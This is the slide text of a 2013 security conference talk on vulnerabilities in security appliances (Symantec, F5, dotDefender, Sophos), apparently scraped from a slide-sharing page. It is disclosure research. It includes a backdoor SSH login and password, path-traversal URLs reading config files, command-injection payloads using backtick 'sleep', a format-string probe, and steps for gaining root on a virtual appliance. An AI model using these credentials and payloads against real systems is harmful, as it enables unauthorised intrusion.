Alexander Antukh. (In)security of Appliances

Insecurity Software
PHDays 2013
Version: 1.0
Author: Alexander Antukh
Responsible: Alexander Antukh
Date: 24.05.2013
Confidentiality: Public

© 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
2

SEC Consult – Who we are
Canada
India
Singapore
SEC Consult Office
SEC Consult Headquarter
Other SEC Consult Clients
Lithuania
Germany
Austria Central and Easter Europe
• Leading international application
security consultancy
• Founded 2002
• Headquarters near Vienna,
Austria
• Delivery Centers in Austria,
Germany, Lithuania and Singapore
• Strong customer base in Central
and Eastern Europe
• Increasing customer base of clients
with global business (esp. out of
Top-10 US and European software
vendors)
• 35+ application security experts
• Industry focus banks, software
vendors, government
USA
3

Alexander Antukh – Whoami
• Security consultant
• Offensive Security Certified Expert
• Defcon Moscow Local Group
Coordinator
*kidhacker
4

Agenda
• Introduction
• The Question
• The Answer
• Afterword
• QA
5

What is Security Software
“A generic term referring to any computer program or library which
purpose is to (help to) secure a computer system or a computer network”
6

7
The keyword in all the security software is…

8

9
In other words, SS is a piece of “anti-evil” software which makes you feel
safe and “anti-bad”

Agenda
• Introduction
• The Question
• The Answer
• Afterword
• QA
10

Historical review
Evolution:
Packet filter Stateful FW App layer FW
First appearance: 1988
First *registered* exploit: 1995
Objective: control network traffic and
determine if it’s good enough to pass
Firewall
11

Historical review
First appearance: 1986
First *registered* hack: 1999
Objective: monitor for malicious
activities or policy violations
(heuristics, signatures...)
ID(P)S
Ceci n‘est pas un firewall...
 Statistical anomaly-based
 Signature-based
12
 Passive (detection)
 Reactive (prevention)

Historical review
AntiSpam evolution:
Del
First appearance: Monty Python
First PoC: 1978
Industrial scale: 1994 - ...
CAN-SPAM Act of 2003: spam is legal
Keywords Blacklists
Auth Protocol analysis Filtering
13

© 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved14
Historical review
First registered hack: 1903
(OSVDB-ID: 79399, 79400)
Anti-sniffing
“… I did it for the lulz”
Today it’s net
configuration, encryption and
IDS/IPS
Nevil Maskelyne

Historical review
First „viruses“: 1971
First viruses: mid-1980s
First AVs: mid-1980s
(CHK4BOMB, BOMBSQUAD, DRPRO
TECT)
Virus evolution:
Benign Destructive $$$$$
Anti-virus

Historical review
AV companies don’t stand still…

Historical review
… neither do other SS products

Agenda
• Introduction
• The Question
• The Answer
• Afterward
• QA

The question
Do you know anybody less boring?
What if the SS is vulnerable itself?

The answer
*sorry for my English

Déjà vu (slide from PHDays 2012)
• Reverse engineering
• Checkpoint – Client side remote command execution
Multiple Checkpoint appliances
CVE-2011-1827
• Fuzzing
• F5 Firepass – Remote command execution
F5 FirePass SSL VPN – Remote command execution
CVE-2012-1777
• Application testing
• Microsoft ASP.Net – Authentication bypass
Microsoft Security Bulletin MS11-100 - Critical
Vulnerabilities in .NET Framework Could Allow Elevation of
Privilege (2638420)
CVE-2011-3416
Security software products will be the target of the trade ... soon !

The time has come!

The answer
• Symantec Messaging Gateway
• Backdoor by design
Code execution
• F5 BIG-IP
• SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
• Format string vulnerability
Code execution
• Sophos Web Protection Appliance
• LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
23

The answer
“... inbound and outbound messaging
security, with effective and accurate real-time
antispam and antivirus protection, advanced
content filtering, data loss prevention, and
email encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
24

The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
25

The answer
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php 
26
F5 BIG-IP <= 11.2.0

The answer
“... dotDefender is a web application
security solution (a Web Application
Firewall, or WAF) that offers
strong, proactive security for your websites
and web applications ...“
Web Attack?
27
AppliCure dotDefender WAF <= 4.26

The answer
• %MAILTO_BLOCK% - email entered in the “Email
address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
Looks nice…

The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…

The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make
policy administration a snap, even for non-
technical users...“
Sophos Web Protection
Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3
c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0)
Gecko/20100101 Firefox/19.0"
Passwords!

The answer
` POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sle
ep%205%60
Diagnostic Tools

The answer
` https://<host>/end-user/index.php?reason=application&client-
ip=%20%60sleep+10%60
Block page (%%user_workstation%%“)

The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`

The answer

Agenda
• Introduction
• The Question
• The Answer
• Afterword
• QA

Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
• Applicaton testing and Fuzzing
• Reverse engineering
• Source code analysis
• A short note on so called “security scanning” tools
36

• The workflow for the appliance analysis is pretty simple!
• get a virtual appliance demo version
• install the appliance
• add the .vmdk to another vm and mount it there (or use a linux fs
driver that can mount vmdk files)
• add a new user to /etc/passwd, or change UID/shell/password of
existing users (or maybe change the sudoers file, sshd config)
• start the appliance again and log in :)
• look at the services that are running (and their configuration)
• pwnage ;)
37

*Move two matches to make it three equal squares
38

Start me up!

Agenda
• Introduction
• The Question
• The Answer
• Afterword
• QA

Sometimes it’s easier to find the vulnerability than it
might be expected . . .
*doesn’t exist yet
And now for something completely different

QA

Alexander Antukh. (In)security of Appliances

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Semelhante a Alexander Antukh. (In)security of Appliances

Semelhante a Alexander Antukh. (In)security of Appliances (20)

Mais de Positive Hack Days

Mais de Positive Hack Days (20)

Último

Último (20)

Alexander Antukh. (In)security of Appliances